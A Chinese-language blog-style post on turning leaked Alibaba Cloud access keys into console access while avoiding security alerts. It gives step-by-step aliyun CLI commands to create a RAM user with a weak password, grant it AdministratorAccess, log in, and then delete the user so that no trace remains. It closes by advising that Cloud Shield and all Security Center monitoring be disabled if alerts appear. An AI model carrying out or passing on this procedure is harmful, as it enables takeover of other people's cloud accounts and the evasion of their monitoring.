之前挖漏洞挖到的阿里云ak和sk经常用cf来登录，但是现在用cf登录的话阿里云容易告警，应该是云厂商研究了cf的特征。现在用cf登录的话会直接紧急告警，所以在我面前有两种方法可选择，一是修改cf特征(二开)，二是使用RAM用户登录，告警会降低级别，不会出现紧急告警的情况。

首先我用自己的阿里云账户创建一个云存储，生成ak和sk，然后调用RAM，具体文档在这里
RAM用户概览
这个文档的操作都是在控制台进行的，渗透过程中只有AK和SK，登录不了控制台，但是有一个工具可以实现创建RAM用户，那就是阿里云CIL，可以在官方文档中自行下载。

全指令查询 aliyun ram

安装好后，打开工具窗口，输入版本命令，查看工具当前版本。

输入aliyun configure，然后再输入得到的ak，sk和云服务所在地区，登陆成功会显示阿里云的LOGO。

创建RAM账号，aliyun ram CreateUser --UserName gowninng

aliyun ram CreateLoginProfile --UserName gowninng --Password 123456789 其中CreateLoginProfile指令为给账户添加web控制台的权限。

aliyun ram ListUsers 查看用户是否创建成功。

aliyun ram ListPolicies 列出权限列表。

aliyun ram AttachPolicyToUser --PolicyType System --PolicyName AdministratorAccess --UserName gowninng

其中AttachPolicyToUser给用户加权限 。

取消管理员权限 aliyun ram DetachPolicyFromUser --PolicyType System --PolicyName AdministratorAccess --UserName gowninng

删除用户 aliyun ram DeleteUser --UserName gowninng

这样就不留痕迹了。

登录账号密码为 账号@别名，密码是自己设置的密码

aliyun ram GetAccountAlias 查询此账户的别名。

然后登陆

并没有告警

如果有告警的话就把云盾干了，记住要先把在云安全中心的所有的监控都都关闭。

思路来自RAM文档